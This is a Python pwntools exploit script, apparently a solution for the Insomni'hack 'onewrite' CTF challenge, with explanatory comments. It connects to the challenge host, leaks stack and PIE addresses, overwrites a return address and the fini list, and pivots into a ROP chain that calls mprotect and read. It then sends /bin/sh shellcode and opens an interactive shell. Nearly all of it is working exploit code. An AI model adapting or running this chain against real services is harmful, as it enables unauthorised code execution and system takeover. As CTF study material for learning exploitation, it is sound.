  1. from pwn import *
  2. from heaputils import *
  3.  
def write(addr, content):
    """Perform one write through the service's two-prompt protocol.

    Waits for the ``"address : "`` prompt and sends ``addr`` as a decimal
    string NUL-padded to 15 bytes, then waits for the ``"data : "`` prompt
    and sends ``content`` packed as an 8-byte value (pwntools ``p64``).

    Uses the module-level connection ``p`` created in the ``__main__``
    guard; returns nothing.
    """
    # Both payloads are pure computations, so build them before talking
    # to the service.
    padded_addr = str(addr).ljust(0xF, "\x00")
    packed_value = p64(content)

    p.recvuntil("address : ")
    p.send(padded_addr)
    p.recvuntil("data : ")
    p.send(packed_value)
  9.  
def exploit():
    """Drive the remote service over the module-level connection ``p``.

    Steps, each keyed to the service's menu prompts:
      1. menu "1": parse a hex value from the reply (used as a stack reference).
      2. partially overwrite a return-address slot derived from that value.
      3. menu "2": parse a second hex leak and derive the PIE base and a set of
         PIE-relative gadget/function addresses from it.
      4. stage a stack pivot and a ``read()`` chain with the ``write`` helper,
         send the final chain and shellcode, then hand the session to the user.

    Relies on module-level names: ``p`` (set in the ``__main__`` guard),
    ``write``, and pwntools ``log``/``p64``/``asm``/``shellcraft``/``sleep``.
    Every literal below is hard-coded for one specific build of ./attackme
    and the author's own debugging sessions (the paired 0x7ff... literals are
    addresses copied from those sessions; only their differences matter), so
    the script is tied to that target and is not portable.
    """
    p.recvuntil(">")
    p.sendline("1")

    # Reply is read as a hex number; the name says it is a stack address.
    STACK = int(p.recvline(),16)
    # Effective offset is +0x18 from STACK.  NOTE(review): session-specific
    # pair of literals -- confirm the delta still matches the target build.
    retaddr_location = 0x7fffd95e7108 - 0x7fffd95e70f0 + STACK
    log.info("STACK: 0x%x"%STACK)
    log.info("retaddr is at: 0x%x"%retaddr_location)

    #partial overwrite
    # Same prompt protocol as write(), but only a single byte (0x04) is sent.
    p.recvuntil("address : ")
    p.send(str(retaddr_location).ljust(0xF,"\x00"))
    p.recvuntil("data : ")
    p.send(chr(0x4))

    #PIE leak
    p.recvuntil(">")
    p.sendline("2")

    # Effective base is do_leak - 0x8a15 (again a pair of session literals).
    do_leak = int(p.recvline(),16)
    PIE = do_leak + 0x7fedc4b54000 - 0x7fedc4b5ca15
    log.info("PIE: 0x%x"%PIE)

    # PIE-relative offsets; presumably taken from ./attackme -- verify against
    # the binary actually in use.  call_rsi is never referenced below.
    call_rsi = PIE + 0x1c763
    pop_rdi = PIE + 0x84FA
    pop_rsi = PIE + 0xD9F2
    pop_rdx = PIE + 0x484C5
    read = PIE + 0x460F0  # shadows the builtin read() for the rest of this function
    mprotect = PIE + 0x47070
    do_overwrite = PIE + 0x89C3
    fini_list = PIE + 0x2ADFB0
    libc_csu_fini = PIE + 0x9810

    # 0x00000000000563d9 : add rsp, 0x148 ; ret
    pivot_gadget= PIE + 0x563d9

    # Full 8-byte overwrite of the same slot that was partially overwritten above.
    p.recvuntil("address : ")
    p.send(str(retaddr_location).ljust(0xF,"\x00"))
    p.recvuntil("data : ")
    p.send(p64(do_overwrite))

    # NOTE(review): by the names, this hooks the fini list so do_overwrite
    # runs again via __libc_csu_fini -- confirm against the binary.
    write(fini_list+8,do_overwrite)
    write(fini_list,libc_csu_fini)

    # form a ROP chain: mprotect / shellcode
    # ropstack is computed but never used below.
    ropstack = PIE + 0x2B4858
    # Effective value is STACK - 0x38; the +0x148 mirrors the pivot gadget's
    # rsp adjustment noted above.  NOTE(review): session-specific literals.
    ropstack_stager = STACK - 0x7ffc89d8d120 + 0x7ffc89d8cfa0 + 0x148
    # Rebinds retaddr_location to a different slot (effective STACK - 0x188),
    # presumably another frame's return address -- confirm.
    retaddr_location = STACK - 0x7ffeaeb3c660 + 0x7ffeaeb3c4d8

    log.info("ROP Stack Stager: 0x%x"%ropstack_stager)


    # Staged chain: rdi=0, rsi=stager+0x38 (right after this chain), rdx=0x1000,
    # then read -- i.e. read(0, stager+0x38, 0x1000).
    write(ropstack_stager,pop_rdi)
    write(ropstack_stager+8,0)
    write(ropstack_stager+0x10,pop_rsi)
    write(ropstack_stager+0x18,ropstack_stager+0x38)
    write(ropstack_stager+0x20,pop_rdx)
    write(ropstack_stager+0x28,0x1000)
    write(ropstack_stager+0x30,read)

    # Return slot -> pivot gadget, which moves rsp onto the staged chain.
    write(retaddr_location,pivot_gadget)

    # Second-stage chain delivered by the staged read():
    # mprotect(PIE, 0x1000, 7), read(0, PIE, 0x1000), then return to PIE.
    ropchain = p64(pop_rdi)+p64(PIE)
    ropchain += p64(pop_rsi)+p64(0x1000)
    ropchain += p64(pop_rdx)+p64(7)
    ropchain += p64(mprotect)

    ropchain += p64(pop_rdi)+p64(0)
    ropchain += p64(pop_rsi)+p64(PIE)
    ropchain += p64(pop_rdx)+p64(0x1000)
    ropchain += p64(read)
    ropchain += p64(PIE)

    # pwntools' stock amd64 Linux /bin/sh shellcode, assembled per context.arch.
    shellcode_d = shellcraft.amd64.linux.sh()
    shellcode = asm(shellcode_d)

    p.send(ropchain)
    # Crude pacing so the chain and the shellcode arrive as two separate
    # read() calls; this is timing-dependent and may fail on a slow link.
    sleep(1) #wait for pipe to end
    p.send(shellcode)

    p.interactive()
  91.  
if __name__ == "__main__":
    # Target is a 64-bit Linux binary; this sets pwntools' packing/asm defaults.
    context.update(os='linux', arch='amd64')

    # Local copy of the challenge binary (loaded, but not otherwise used here)
    # and the remote challenge service that exploit() talks to.
    e = ELF("./attackme")
    p = remote("onewrite.teaser.insomnihack.ch", 1337)

    exploit()